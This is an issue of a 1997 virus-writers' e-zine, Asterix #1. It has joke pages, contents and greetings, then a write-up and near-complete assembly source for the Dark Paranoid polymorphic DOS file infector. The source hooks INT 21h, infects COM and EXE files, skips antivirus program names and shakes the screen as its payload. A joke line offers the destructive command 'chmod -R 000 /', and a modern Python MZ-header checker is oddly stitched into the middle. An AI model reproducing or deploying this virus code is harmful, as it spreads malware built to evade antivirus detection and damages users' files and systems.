pesimized for IE 800x600 hicolor © 1997 *-zine crew

EZine - Asterix #1


Page 1: EZine - Asterix #1


Page 2: EZine - Asterix #1

Hardware-independent means it doesn't run on any computer.

This mail is delivered using 100% recyclable electrones.

Have you heard about Microsoft's new crystal ball? Anything you ask, it answers: "Not enough memory, add 20MB and try again"

If God wanted humans to work with computers, he'd equip them with fast I/O ports.

Quadrature of a circle? Phew! Try to install Windows95!

Sex is 1 of 9 reasons for reincarnation; the other 8 are unimportant.

When the lights are out, all women are beautiful.

Virginity can be cured.

Page 3: EZine - Asterix #1

Your Hard Disc is dead, but Eddie lives!

Wanna keep your system ABSOLUTELY secured? Use: su -c "chmod -R 000 /"

File not found - Should I fake it?

What is this red button fowr9Y~~m NO CARRIER

How to double your disk drive space: Delete Windows.

Avoid hangovers: Stay drunken.

/etc/passwd: no such file or directory

Microsoft: brings power of yesterday to computers of today.

Life could be much easier if we have its source code.

#define QUESTION (2B || !2B) // Shakespeare

Page 4: EZine - Asterix #1

This section is the finest spice, which makes the mag much tastier. We bring to you quality, not quantity. At least in this issue.

Dark Paranoid / Terror-6
Kyjacisko / Vyvojar
One_Half.3577 / Vyvojar
TMC:Level_6x9.A (Tiny Mutation Compiler) / Ender
WordMacro.SlovakDictator / Nasty Lamer & Ugly Luser

From the top position of the Wild list comes the famous One_Half.3577 by Vyvojar, one of the best viruses ever written. We also present the unusual virus Dark Paranoid by Terror-6, an author with innovative ideas and a very coolio style of coding. Ender, the TMC author, didn't want to release full sources due to his "love" of AVerz, so we were at least allowed to publish a description based on source code analysis and a sample of the second generation. Blesk experimented lately with archive infection and we present the results of his research. Two really "lame" macrovirus authors - The Nasty Lamer and The Ugly Luser - wrote two nice macroviruses for our mag. That would be nothing special, but those macroviruses are top elite. They have variable length, they are truly polymorphic, and only one exemplar is detected by f-win. This is a quite funny story. Some 10 dayz ago the authors uploaded that one sample to cicatrix's site :) It is a very crazy idea to detect this one macro by CRC (f-win suX), or am I not right, dear Frisk???


Page 5: EZine - Asterix #1

At this time our Article section is only virus oriented (the rest of H/P/A/V is omitted right now), just because the submissions we received were virus only. But in future issues we promise to cover not only viruses. However, who knows :-) So enjoy these articles; we hope they'll bring some interesting infoz to you - there's rather a lot of stuff left to read, so go for 'em!

Stealth / mgl
Dark Avenger - the legend / mgl
End of TBAV independence / mgl
CPU opcodes / mgl
RAR'n'ARJ dropper / blesk
Story of one book / The Ziggy Zag
Diary - Present future to forgotten past / The Unforgiven of Immortal Riot/Genesis

Page 6: EZine - Asterix #1

In this issue we have 4 interviews. I think that is enough for one issue. But actually, in this first issue we present only the VX side of the biz. We've selected 4 interesting people, from 4 groups and two continents. We hope you'll enjoy all the questions and answers. Stuff in brackets are comments by flush or mgl.

Interview with CoKe of VLAD
Interview with WildW0rker of RSA
Interview with Sep of IRG
Interview with MrSandman of 29A


Page 7: EZine - Asterix #1

So, everything ends sometime or somewhere. And you have, unfortunately, reached the end of our first issue. We hope you all enjoyed the mag. To tell the truth, at some moments we lost hope the mag would ever be released. First we had a viewer but not enough articles, then we obtained high quality articles but found the viewer shitty... So we decided to use a new mag engine, The CYBERAGE. After all the problems, the zine went out (uraaaaaaaaaaaaaaaaaaaaaaaaah!!!!). We know our English is in some points quite buggy. We apologise :(((( But in the limited time we had for our work there was no opportunity to find some workaround. On the other hand, we brought to you in this issue tasty and cheesy high quality viruses and some other stuff. If you enjoyed the mag, please give us some form of feedback (look at the "How to contact us" section). We need some moral support to keep us encouraged for the next issues. Do not forget, everyone has a share, everyone can contribute.

flush + mgl

Page 8: EZine - Asterix #1

Dear reader, please allow me to introduce the first (and, I hope, not the last) issue of our zine. I hope everyone will find in this issue at least two or three articles which will be of some value to him.

We would like to focus our mag not only on virii, but also on the rest of H/P/A/V. Of course, we don't want to present only our own stuff; every piece of your activity, dear reader, will be great. If you are the author of the ultimate, kick-the-ass virus or utility, or just want to tell your latest experiences or opinions to the rest of the community, contact us! We would like to make your stuff public.

Remember, not everyone is a virus&asm guru, so we'll bring some stuff which for some of you dudes could be trivial or lame. But for someone it could be a good example or even the inspiration for their own start as a vx coder.

Last but not least, we'll try to bring some interesting background stories and infos, some virus-history related articles and more ...

Why is this zine named '*'? Well, we got several explanations. Just choose your favourite one.
'*' in computer terms stands for wildcard - the sign that covers everything.
'*', whose ASCII code is 42, was the international dialling code for Slovakia, the origin of the editors of this zine. However, nowadays we got a new dial-code, 421 :(
'*', the number 42, is the answer to the ultimate question of life, the universe and everything.

Page 9: EZine - Asterix #1

This little section is very important. If we forgot to include your name, don't worry about it. We apologise for such an omission, but on the other hand, who cares?

Personal greetings
Virus section

Sep-IRG - if we meet personally, we 'll land in next pub

TuIRG - thanx for your great contribution

QuantumG - your Unix page is gr8t

Ww0rker - how do you feel as freshly married ? :-P

Mr.Sandman - 29A - isn't it MiG some fighter ?

l- - can i get some nukes ? And how was the stay on Hawaii ?

Dark Avenger - long live the legend !

lovinGOD - it's really hard to meet you on #virus

Dark Angel - was nice to meet you

yurik - nu, neudalos, poprobuem esco odin razik

Tornado - are you alive ?

avd - TMC is really kick the ass virus

Ender - awaiting your next virus

Online - yu'v kewl style of coding

Nasty Lamer & Ugly Luser - you kicked the fwin's ass :))))

_COKe_ - keep da VLAD alive !!! Und zum Wohl !

Vyvojar - how did you find us ???

Blesk - sorry for the viewer. But thiz1 is really the best from all 'round the world

Page 10: EZine - Asterix #1

kdkd - 777 !

qark - thanx for sending me VLAD in the past

rebyc - hope my mail 'll reach yer mbox. And be ready for the anti M$ stuff

Page 11: EZine - Asterix #1

Dark Paranoid

This is another elite contribution to our zine. So, after some time has passed since the release of this beautiful piece of code, we can present it to the virus community. I would like to express my unlimited thanx to the author for allowing me to publish the source code. The coder of Dark Paranoid, known under the handle Terror-6, is one of the young Slovak programmers who are continuing the work of Vyvojar - to bring to the world new, never before seen viruses of the finest Slovak quality. So far, according to available information, Terror-6 is working on something, but no one knows what it is. But we can hope it will be some wild thing.

And now, let's talk about Dark Paranoid. This is a very unusual com'n'exe file-infecting resident virus. The approximate length of the code appended to the target file is about 6 kB. When infecting COM files, Dark Paranoid places its own code at the start of the file and the original contents of the file are moved behind the viral body. EXEs are infected as usual: the virus is appended to the end of the file and the header is manipulated to point to the virus. But what makes Dark Paranoid so unusual is its polymorphism. This virus is polymorphic even in memory. At every moment, only one instruction of the virus is unencrypted. After execution of this instruction, INT 1 occurs. The INT 1 handler re-encrypts the executed instruction and decrypts the next one. The decrypted instruction is executed and encrypted again. This is the principle of Dark Paranoid's "ENGINE OF ETERNAL ENCRYPTION". If you think that the INT 1 handler could be used as a possible scanstring, you are so hopeless and crap ...

If the author spent such an amount of time and beer to code such a beautiful virus, and then allowed it to be caught in memory with a simple scanstring, he'd be a big jerk. So, dear AVerz and dear virus friends, the handler is slightly polymorphic. On every installation into memory, this handler is changed.

The virus avoids infecting files whose names start with 'AV', 'SC', 'CL', 'GU', 'NO', 'FV', 'TO', 'TB'. In plain text, Dark Paranoid will not infect AVP, SCAN, CLEAN, GUARD, NOD (but ICE will be infected :(((( ), FINDVIRUS, TOOLKIT and TBAV. Dark Paranoid also avoids infecting baits and goats.
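An EXE infector that appends itself has to rewrite the MZ header so the declared load-module size covers the new tail and CS:IP lands in it; a scanner can turn that around and test the header against the real file. The following Python is an added example written for this page, not code from the zine or from the virus author: field names follow the 14-word Exe_Header layout quoted in the listing, while the sample files, the 25% "tail" threshold and the finding codes are the example's own assumptions.

```python
"""Consistency checks on a DOS MZ header (added example, constructed data).

Heuristics: (1) the size implied by pages/modulo must equal the real file
length (a naive appender that forgets the header trips this); (2) the initial
CS:IP should not point into the final stretch of the file, which is where
appended code lives; (3) a non-zero overlay number is unusual for a plain host.
"""
import struct

# Field order follows the 14-word Exe_Header struct quoted on the page.
HDR = struct.Struct("<14H")
FIELDS = ("signature", "modulo", "pages", "reloc", "hdr_paras", "min_mem",
          "max_mem", "ss", "sp", "checksum", "ip", "cs", "reloc_tab", "ovl")
PAGE = 512   # DOS load-module page
PARA = 16    # paragraph


def parse_mz(data: bytes) -> dict:
    """Unpack the header; DOS accepts both 'MZ' and the 'ZM' byte order."""
    if len(data) < HDR.size:
        raise ValueError("too short for an MZ header")
    if data[:2] not in (b"MZ", b"ZM"):
        raise ValueError("not an MZ executable")
    return dict(zip(FIELDS, HDR.unpack_from(data)))


def declared_size(hdr: dict) -> int:
    """File length implied by the header: last page is partial if modulo != 0."""
    if hdr["modulo"] == 0:
        return hdr["pages"] * PAGE
    return (hdr["pages"] - 1) * PAGE + hdr["modulo"]


def entry_offset(hdr: dict) -> int:
    """File offset of the initial CS:IP (CS is relative to the load module)."""
    return (hdr["hdr_paras"] + hdr["cs"]) * PARA + hdr["ip"]


def check_mz(data: bytes, tail_fraction: float = 0.25) -> list:
    """Return finding codes for one file; an empty list means nothing odd seen."""
    hdr = parse_mz(data)
    findings = []
    if declared_size(hdr) != len(data):
        findings.append("SIZE_MISMATCH")        # header does not cover the bytes on disk
    entry = entry_offset(hdr)
    if entry >= len(data):
        findings.append("ENTRY_OUTSIDE_FILE")
    elif entry >= len(data) - int(len(data) * tail_fraction):
        findings.append("ENTRY_IN_TAIL")        # execution starts in the last quarter of the file
    if hdr["ovl"] != 0:
        findings.append("OVERLAY_NUMBER_NONZERO")
    return findings


def build_sample(body: bytes, cs: int, ip: int) -> bytes:
    """Constructed test file: 32-byte header + body, with pages/modulo filled in honestly."""
    total = 32 + len(body)
    pages, modulo = divmod(total, PAGE)
    if modulo:
        pages += 1
    hdr = HDR.pack(0x5A4D, modulo, pages, 0, 2, 0, 0xFFFF, 0, 0x100, 0, ip, cs, 0x1C, 0)
    return hdr + b"\0" * (32 - HDR.size) + body


# Constructed stand-ins: a 4 KiB "host" body and a 1 KiB inert tail of zero bytes.
HOST = b"\x90" * 4096
TAIL = b"\0" * 1024
CLEAN = build_sample(HOST, cs=0, ip=0)                          # entry at the start of the body
APPENDED = build_sample(HOST + TAIL, cs=len(HOST) // PARA, ip=0)  # header rewritten, entry in the tail
LAZY = CLEAN + TAIL                                             # bytes added, header left alone

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("appended", APPENDED), ("lazy", LAZY)):
        print(f"{name:9s} {check_mz(blob) or ['OK']}")
```

A real scanner would add a known-good signature check on the tail, since an honest header rewrite (the APPENDED case) leaves only the entry-point position as evidence.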


Page 12: EZine - Asterix #1

Dark Paranoid contains a payload - it prints the text Dark Paranoid on the screen and shakes the screen.

Finally, all I have to say is - enjoy the code.


Page 13: EZine - Asterix #1

DARKPARA.ASM

; compile to COM then run it.

.MODEL tiny

.CODE

.186

begin :org 100h

virlen equ ( offset endv - offset begin )heaplen equ ( offset heapend - offset heapbeg )datalen equ ( offset dataend - offset heapbeg )len_range equ 1001d_len equ offset d_end - offset d_begactionc equ 4096MAXinst equ 8b_d equ 40hlen equ virlen +heaplenWRITE_LEN equ virlen +datalenwrite_len_exe equ virlen +( offset data_12e - offset heapbeg )com_len equ write_len - 100hREQUEST_MEM equ ( len )/ 16+1C_head equ offset C_aft - offset startss_distance equ 512MAXCOM equ 65535gb_len equ offset gb_end - offset gb_memHEADERLEN equ 20hdecr_code equ offset gb_mem- offset startvSP equ 200hSS_to_CS equ ( write_len_exe +len_range )/ 16+1TF equ 300h

start :old_enable :ENABLE:

push dspush di

push 0popf

xor di , dimov ds , di

e1: mov di , cs :[ engine__ ]xchg word ptr ds :[ 01* 4], di

e2: mov word ptr cs :[ old1 ], dimov di , csxchg word ptr ds :[ 01* 4+2], di

e3: mov word ptr cs :[ old1 +2], di

pop dipop ds

push TFpush cs

ent_ :push offset start_v

eA: mov cs :[ oldptr ], offset rcptiret

old_engine :

Page 14: EZine - Asterix #1


ENGINE: pushamov bp, sppush dspush cspop ds

e5: mov si , cs :[ oldptr ]ec_oldx : nopeng2 : mov si ,[ bp+16]dc_oldx : nope6: mov word ptr cs :[ oldptr ], si

pop dspopa

eng_iret : iret

old_disable :DISABLE: push ds

push dixor di , di

mov ds , die8:

mov di ,word ptr cs :[ old1 ]mov ds :[ 4], dimov di ,word ptr cs :[ old1 +2]mov ds :[ 6], di

pop dipop ds

Iretorg 300h

C_aft :gb_mem:old1 dd ?engine__ dw offset ENGINEoldptr dw ?k1 dw ?k2 dw ?k3 dw ?gb_end :

org 400h

pred db MAXinst dup (?)start_v : nop

push es

push cspop ds

jmp IDENTIFY

action :mov ax , 0b800hmov ds , axmov si , 160* 12+60mov byte ptr [ si ], 'D'mov byte ptr [ si +2], 'a'mov byte ptr [ si +4], 'R'mov byte ptr [ si +6], 'K'mov byte ptr [ si +8], ' 'mov byte ptr [ si +10], 'P'mov byte ptr [ si +12], 'A'mov byte ptr [ si +14], 'R'

Page 15: EZine - Asterix #1


mov byte ptr [ si +16], 'a'mov byte ptr [ si +18], 'N'mov byte ptr [ si +20], 'O'mov byte ptr [ si +22], 'i'mov byte ptr [ si +24], 'D'

xor cx , cx

ddd : push cx

mov ax , 3call randommov ah, 80mul ahmov bl , almov ax , 5call randomadd al , 80- 2add al , blmov ah, almov al , 0dh

mov dx , 3d4hout dx , alxchg al , ahinc dxout dx , al

mov dl , 0b4hxchg ah, alout dx , alinc dxxchg ah, alout dx , al

mov dx , 61hand al , 002hor al , 30hout dx , al

pop cxdec cxjnz ddd

retn

ALLOC:mov ah, 50hmov bx , 8int 21hnopmov ah, 48hmov bx , REQUEST_MEMint 21hnoppushfpush axmov bx , esmov ah, 50hint 21hnop

Page 16: EZine - Asterix #1


pop axpopfretn

ACCESS: mov ax , 5800hint 21hnopmov [ UMB_strategy ], axmov ax , 5802hint 21hnopmov ah, 0mov [ UMB_link ], axmov ax , 5801hmov bx , 0041h ; umb - best fitint 21hnopmov ax , 5803hmov bx , 1int 21hnopretn

UNACCESS: push axmov bx ,[ UMB_link ]mov ax , 5803h ; restore chainint 21hnopmov ax , 5801h ; restore strategymov bx ,[ UMB_strategy ]int 21hnoppop axretn

gen_preint : mov ax , 6call randomadd al , 0f8hmov byte ptr [ INT_21 ], alretn

IDENTIFY :mov ah, 2ahint 21hnopcall cr_dataadd cx , dxmov dx , cs

INSTALL_TO_MEM: call ACCESScall ALLOCpushfcall UNACCESSpopfjnc mem_ok

LOW_INSTALL:mov ax , 4a00h +'¨'mov bx ,- 1int 21hnopmov ah, 4ahsub bx , REQUEST_MEM+1int 21hnop

Page 17: EZine - Asterix #1


call ALLOCjnc mem_okpush espop dsint 20hnop

mem_ok:mov es , ax

COPY: cldpush cspop dsxor si , sixor di , dimov cx , write_len / 2+1

rep movsw

HIGHz: push espop ds

rl2 :mov ax , offset temp_int_21mov di ,word ptr [ ent__ ]mov [ di ], ax ; entry point

call init_randomGET_VECTORZ: push 0

pop dsmov ax , ds :[ 4* 21h ]mov bx , ds :[ 4* 21h+2]mov word ptr es :[ old_21 ], axmov word ptr es :[ old_21 +2], bx

mov ax , cs :[ bitch ]mov word ptr ds :[ 4* 21h ], axmov word ptr ds :[ 4* 21h+2], es

mov byte ptr es :[ TEMP_INT_21], 90h

mov es , dxpush cspop ds

call gen_preint

mov ah, 4ch ; don't think it ends so soon.int 21h ; so much things to do.

TEMP_INT_21: nopadd sp , 6

push dspush cspop dsmov di ,[ old1_ofs ]mov ax ,word ptr es :[ di ]mov word ptr ds :[ di ], axmov ax ,word ptr es :[ di +2]mov word ptr ds :[ di +2], ax

MAKE_HEAP: xor ax , ax

Page 18: EZine - Asterix #1


mov [ create ], ax

mov ax , offset int_21mov di ,word ptr [ ent__ ]mov [ di ], ax

push espushacall morphpush 0pop dsmov ax , cs :[ bitch ]mov word ptr ds :[ 4* 21h ], ax

popapop es ds

RETURN: mov ax , sscmp ax , dxje COM_RETURN

EXE_RETURN: pop esmov cx , esadd cx , 10h

mov bx ,[ old_ss ]add bx , cx

add [ old_cs ], cx

mov ax ,[ old_sp ]sub ax , sp

mov ss , bxadd sp , ax

push 200hpush word ptr [ old_cs ]push word ptr [ old_ip ]

call entry_regsjmp take_off_2

entry_regs : xor si , sixor di , dixor ax , axxor bx , bxxor cx , cxxor dx , dxpush espop dsretn

COM_RETURN:mov cx ,[ block_len ]mov si ,[ block_beg ]mov di , 100hadd si , dicldrep movsb

Page 19: EZine - Asterix #1


pop escall entry_regs

push 200hpush espush 100hjmp take_off_2

TAKE_OFF_2: pushapush ds

push cspop dsmov al ,byte ptr [ dis_val ]mov byte ptr [ rcpt ], al

pop dspopa

push cs :[ disable__ ]push 0push cspush offset rcptiret

ena_pop :

int_21 : nopcmp ah, 5bh ; create new fileje crtcmp ah, 3chjne v001

crt : cmp cs :[ create ], 0jne jincall executable

jin : jnz JUMP_INT21cr_co : call hookold

INT 21h ; come get somepush dspush cspop dsjc donemov [ create ], ax

done : call rehookpush simov si , sppush sspop dspush axlahfmov [ si +8], ahpop axpop sipop dsjmp take_off_2

v001 : cmp ax , 6c00hjne v002cmp dl , 10hje ok6ccmp dl , 12hjne JUMP_INT21

Page 20: EZine - Asterix #1


ok6c : cmp cs :[ create ], 0jne JUMP_INT21xchg si , dxcall executablexchg si , dxjnz JUMP_INT21test bl , 2jnz cr_copush ax cxpush bxand bl , 0fchinc blinc blcall hookoldINT 21hnopcall rehookpop bxjnc cr_2pop cx axjmp JUMP_INT21

cr_2 : add sp , 4push dspush cspop dsmov [ create ], axjmp done

v002 : cmp ah, 3ehjne v003cmp cs :[ create ], bxjne v003jmp INFECT_

v003 : cmp ax , 5800hje ID_OK

JUMP_INT21: push 0push word ptr cs :[ old_21 +2]push word ptr cs :[ old_21 ]jmp TAKE_OFF_2

hookold : push ax ds espush 0pop dspush cspop esmov ax ,word ptr cs :[ old_21 ]xchg ax , ds :[ 21h* 4]mov es :[ hook21 ], axmov ax ,word ptr cs :[ old_21 +2]xchg ax , ds :[ 21h* 4+2]mov es :[ hook21 +2], axpop es ds axretn

rehook : push ax dspush 0pop dsmov ax , cs :[ hook21 ]

Page 21: EZine - Asterix #1


mov ds :[ 21h* 4], axmov ax , cs :[ hook21 +2]mov ds :[ 21h* 4+2], axpop ds axretn

X_21: push ax dspush cspop ds

mov ax ,word ptr [ safe ]mov word ptr [ rcpt ], axmov al ,[ safe +2]mov byte ptr [ rcpt +2], alpop ds axjmp rcpt

ID_OK:push axpush dx cxcall hookoldmov ah, 2ahint 21hnopcall rehookmov ax , cxadd ax , dxpop cx dxcmp ax , cxpop axjne JUMP_INT21add sp , 8jmp return

EXECUTABLE: pushacldmov si , dxmov bx , dx

i002 : lodsbcmp al , '\'je yepacmp al , ':'jne nopa

yepa : mov bx , sinopa : or al , al

jnz i002mov ax ,[ bx ]mov bl ,[ bx +2]and ax , 0dfdfhand bl , 0dfhcmp ax , 'VA' ; AV[*]je ex_2cmp ax , 'CS' ; SCANje ex_2cmp ax , 'LC' ; CLEANje ex_2cmp ax , 'UG' ; GUARD (of eden ? )je ex_2cmp ax , 'ON' ; NOD ?je ex_2cmp ax , 'VF' ; ???

Page 22: EZine - Asterix #1


je ex_2cmp ax , 'OT' ; toolkitje ex_2cmp ax , 'BT' ; tbavje ex_2

inc alcmp al , 'Z' +1jne sksmmov al , 'A'

sksm:cmp al , ahjne namvspbinc ahcmp ah, 'Z' +1jne skasmmov ah, 'A'

skasm:cmp bl , ahje ex_2

namvspb :mov ax ,[ si - 3]mov bl ,[ si - 4]or ax , 2020hor bl , 20hcmp ax , 'ex'jne i003cmp bl , 'e'je ex_en

i003 : cmp ax , 'mo'jne ex_en

ex_2 : cmp bl , 'c'ex_en : popa

retn

I_ERROR: jmp i_ecINFECT_:

pushapush dspush escall hookoldpush cspop espush cspop ds

i001 :TIMESTAMP: mov ax , 5700h

INT 21Hnopmov al , cland al , 1fhdec aljnz ts_1jmp BAD_TIME

ts_1 : push cspop dsmov [ time ], cxmov [ date ], dx

READ_BUFFER: call seekstart

mov dx , offset buffermov cx , HEADERLEN

Page 23: EZine - Asterix #1


mov ah, 3fhINT 21hnopjc i_errorcmp ax , cxjne i_errorcall random0mov byte ptr [ int_21 ], al

mov ax , len_rangecall randommov [ len_add ], axmov ax , actionccall randomcmp ax , 111hjne noactpushapush dscall actionpop dspopa

noact :

mov ax ,word ptr [ buffer ]cmp ax , 'MZ'je E_I_2cmp ax , 'ZM'jne COM_INFECT

e_i_2 : jmp EXE_INFECTisi : push si

add [ disable__ ], axadd [ ent__ ], axadd [ dc_old ], axadd [ dco_end ], axadd [ bitch ], ax

mov si ,[ __old_1 ]add [ si +4], ax

pop siretn

cni : jmp CAN_NOT_INFECT

COM_INFECT: call seekend

or dx , dxjnz CNIcmp ax , maxCOM- COM_Lenja CNImov [ block_beg ], ax

call seekstart

push bxcall ACCESSmov ah, 48hmov bx ,( COM_len+d_len +1+len_range )/ 16INT 21hpop bxjnc canaljmp CAN_NOT_ALLOCATE

Page 24: EZine - Asterix #1


canal :mov cx , COM_lenadd cx ,[ len_add ]mov [ temp_seg ], axmov ds , axxor dx , dxmov ah, 3fhINT 21hnoppush cspop dsmov [ block_len ], axpush ax

call seekstart

mov si ,[ ent__ ]push [ si ]mov word ptr [ si ], offset start_v

mov dx ,[ bitch ]mov ax , 100hsub ax , dxpush axcall isi

mov cx , C_headmov ah, 40hcall x_21

mov dx , offset C_aftmov cx , COM_lenadd cx ,[ len_add ]

cmp [ block_beg ], cxjae long_cmov [ block_beg ], cx

long_c :sub cx ,[ len_add ]sub cx , d_len +C_headmov ah, 40hcall cr_datacall x_21call cr_dataadd [ len_add ], d_lencall write_add

pop axneg axcall isi

pop [ si ]call seekendpop cxxor dx , dxmov ds ,[ temp_seg ]mov ah, 40hINT 21hnop

push dspop es

Page 25: EZine - Asterix #1


mov ah, 49hINT 21hnop

push cspop dspush cspop es

CAN_NOT_ALLOCATE:call UNACCESS

CAN_NOT_INFECT:mov cx ,[ time ]mov dx ,[ date ]mov ax , 5701hand cl , 0e0hor cl , alINT 21hnop

BAD_TIME:i_ec : mov [ create ], 0

call rehookcall gen_preintpop espop dspopajmp JUMP_INT21 ; close

Exe_Header STRUCEH_Signature dw ? ; Set to 'MZ' or 'ZM' for .exe filesEH_Modulo dw ? ; remainder of file size/512EH_Size dw ? ; file size/512EH_Reloc dw ? ; Number of relocation itemsEH_Size_Header dw ? ; Size of header in paragraphsEH_Min_Mem dw ? ; Minimum paragraphs needed by fileEH_Max_Mem dw ? ; Maximum paragraphs needed by fileEH_SS dw ? ; Stack segment displacementEH_SP dw ? ; Stack PointerEH_Checksum dw ? ; Checksum, not usedEH_IP dw ? ; Instruction Pointer of Exe fileEH_CS dw ? ; Code segment displacement of .exeeh_1st_reloc dw ? ; first relocation itemeh_ovl dw ? ; overlay numberExe_Header ENDS

EXE_INFECT: push cspop esmov si , offset buffer +EH_SScmp byte ptr [ si +18h - EH_SS], 40hje i_eccmp word ptr [ si +eh_ovl - EH_SS], 0 ; no evrs.jne i_eccmp byte ptr [ si +eh_max_mem- EH_SS+1], 7jbe i_ecmov di , offset old_SScldmovswmovswlodsw ; skip checksummovswmovsw

Page 26: EZine - Asterix #1


call seekendSET_EXE_HEAD: push ax dx

mov cx , 200hdiv cxdec axcmp word ptr [ buffer +EH_size ], axpop dx axjb i_ec

EI03 : push ax dxand al , 0fhjz no_addmov cx , 10hsub cl , almov ax , 0b000hcall randomxchg dx , axmov ah, 40hINT 21hnoppop dx axadd ax , cxadc dx , 0jmp short yes_add

no_add : pop dx axyes_add : push ax dx

mov cx , 16div cxmov dx ,[ bitch ]mov word ptr [ buffer +EH_IP], dxsub ax ,word ptr [ buffer +EH_Size_Header ]mov word ptr [ buffer +EH_CS], ax

add ax , SS_to_CSmov word ptr [ buffer +EH_SS], axmov ax , 900hcall randomadd ah, 2mov al , 0mov word ptr [ buffer +EH_SP], ax

pop dx ax

add ax ,[ len_add ]adc dx , 0add ax , write_len_exeadc dx , 0mov cx , 200hdiv cxmov word ptr [ buffer +EH_Modulo ], dxor dx , dxjz EI01inc ax

EI01 : mov word ptr [ buffer +EH_Size ], axmov si ,[ ent__ ]push [ si ]mov word ptr [ si ], offset start_v

xor dx , dxmov cx , write_len_exemov ah, 40h

Page 27: EZine - Asterix #1


call cr_datacall x_21call cr_datapop [ si ]

call write_add

jnc EI02jmp CAN_NOT_INFECT

EI02 :call seekstart

mov dx , offset buffermov cx , headerlenmov ah, 40hINT 21hnop

jmp CAN_NOT_INFECTseekend : mov ax , 4202hse_c : xor cx , cx

xor dx , dxINT 21hretn

seekstart : mov ax , 4200hjmp short se_c

fake_seg : mov ax , 0fa00hcall randommov ds , axmov al ,byte ptr ds :[ 0]cmp al ,byte ptr ds :[ 1]je fake_segmov al ,byte ptr ds :[ len_range - 6]cmp al ,byte ptr ds :[ len_range - 8]je fake_segretn

write_add : call fake_segmov cx , cs :[ len_add ]xor dx , dxmov ah, 40hINT 21hnoppush cspop dsretnretn

cr_ax equ offset cr_block +2

cr_randomize :mov di , offset cr_axmov cx , 6

cr_lop :movswscaswscasbmovswscaswscasb

Page 28: EZine - Asterix #1


dec cxjnz cr_lopretn

cr_data : push simov si , offset heapbeg

xorsi macro numdb 81h , 74h ,& num, 0, 0endm

cr_block :db 81h , 34h , 0, 0xorsi 2 ; ????xorsi 4xorsi 6xorsi 8xorsi 10

xorsi 12xorsi 14xorsi 16xorsi 18xorsi 20xorsi 22

pop siretn

dil_ck : stoswxchg ax , bxstoswxchg ax , cxstoswxchg ax , dxstoswxchg ax , sistoswretn

dil_gen : mov di , offset getlostmov ax , 08b2ehmov bx , 0026h +256*( 255 and ( offset sp_tmp - offset begin ))mov cx , 0bf00h +( offset sp_tmp - offset begin ) shr 8mov dx , offset rcptmov si , 0f78bhcall dil_ckmov ax , 0df8bhmov bx , 04c6hmov cx , 0ffc3hmov dx , 0016h +256*( 255 and ( offset ec_new - offset begin ))mov si , 8a00h +( offset ec_new - offset begin ) shr 8call dil_ckmov ax , 0a204hmov bx , offset dis_valmov cx , 05c7hmov dx , 21cdhmov si , 45c6hcall dil_ckmov ax , 0c302hmov bx , 16ffhmov cx , offset ec_new

Page 29: EZine - Asterix #1


mov dx , 368bhmov si , offset ecn_endcall dil_ckmov ax , 048fhmov bx , 00beh +256*( 255 and ( offset new_enable - offset begin ))mov cx , 8b00h +( offset new_enable - offset begin ) shr 8mov dx , 0003eh +256*( 255 and ( offset bitch - offset begin ))mov si , 0b900h +( offset bitch - offset begin ) shr 8call dil_ckmov ax , decr_code / 2mov bx , 0a5f3hmov cx , 0c033hmov dx , 0c08ehmov si , 368bhcall dil_ckmov ax , offset m1mov bx , 8926hmov cx , 0436hmov dx , 8b00hmov si , 00036h +256*( 255 and ( offset __old_1 - offset begin ))call dil_ckmov ax , 0c700h +( offset __old_1 - offset begin ) shr 8mov bx , 0644hmov cx , offset predmov dx , 00068h +256*( 255 and TF)mov si , 0e00h +( TF) shr 8call dil_ckmov ax , 00068h +256*( 255 and ( offset getlost_po - offset begin ))mov bx , 02e00h +( offset getlost_po - offset begin ) shr 8mov cx , 36ffhmov dx , offset m1mov si , 0c6c3hcall dil_ckmov ax , 0c304hmov bx , 0c726hmov cx , 0406hmov dx , 0000h +256*( 255 and ( offset reCrypt - offset begin ))mov si , 0c700h +( offset reCrypt - offset begin ) shr 8call dil_ckmov ax , 0006h +256*( 255 and ( offset oldptr_2 - offset begin ))mov bx ,( offset oldptr_2 - offset begin ) shr 8+256*( 255 and ( offset pred +1- offset begin

))mov cx , 05500h +( offset pred +1- offset begin ) shr 8mov dx , 0ec8bhmov si , 1f0ehcall dil_ckmov ax , 070eh

mov bx , 368bhmov cx , offset oldptr_2mov dx , 0fe8bhmov si , 0de8bhcall dil_ckmov ax , 16ffhmov bx , offset ec_newmov cx , 0fe81hmov dx , offset END_offsetmov si , 0372hcall dil_ckmov ax , 07be9hmov bx , 2bffhmov cx , 0276hmov dx , 0def7h

Page 30: EZine - Asterix #1


mov si , 0ce8bhcall dil_ckmov ax , 0e981hmov bx , 0008hmov cx , 0d9f7hmov dx , 0c681hmov si , offset rcptcall dil_ckmov ax , 7e8bhmov bx , 0f302hmov cx , 8ba4hmov dx , 0276hmov si , 000bfh +256*( 255 and ( offset rcpt - offset begin ))call dil_ckmov ax , 0a500h +( offset rcpt - offset begin ) shr 8mov bx , 0a5a5hmov cx , 8ba5hmov dx , 0276hmov si , 0fe8bhcall dil_ckmov ax , 0de8bhmov bx , 16ffhmov cx , offset dc_oldmov dx , 3689hmov si , offset oldptr_2call dil_ckmov ax , 048bhmov bx , 0cd3chmov cx , 3a74hmov dx , 0f3chmov si , 3774hcall dil_ckmov ax , 703chmov bx , 0472hmov cx , 7f3chmov dx , 2f76hmov si , 08e3dhcall dil_ckmov ax , 74d3hmov bx , 3c28hmov cx , 7461hmov dx , 3d27hmov si , 0f1f7hcall dil_ckmov ax , 2174hmov bx , 0c33chmov cx , 1e74hmov dx , 0ee3chmov si , 1a74hcall dil_ckmov ax , 0cf3chmov bx , 1574hmov cx , 0eb3chmov dx , 1174hmov si , 0e83chcall dil_ckmov ax , 0c74hmov bx , 0e93chmov cx , 0874hmov dx , 0ff3dhmov si , 74d0hcall dil_ck

Page 31: EZine - Asterix #1


mov ax , 0eb04hmov bx , 460ahmov cx , 4646hmov dx , 8946hmov si , 0276hcall dil_ckmov ax , 073e9hmov bx , 33ffhmov cx , 033f6hmov dx , 033ffhmov si , 0a1dbhcall dil_ckmov ax , offset empty_segmov bx , 0d88ehmov cx , 0c08ehmov dx , 0c033hmov si , 0cf5dhjmp dil_ck

POWERUP: push cspop escldcall fake_segxor si , simov di , offset new_enablemov cx , decr_code / 2rep movswpush cspop ds

mov [ __entry ], offset int_21

mov ax , 101hcall randommov [ bitch ], axadd ax , offset old_enable - offset new_enable - 100hmov [ b2], ax

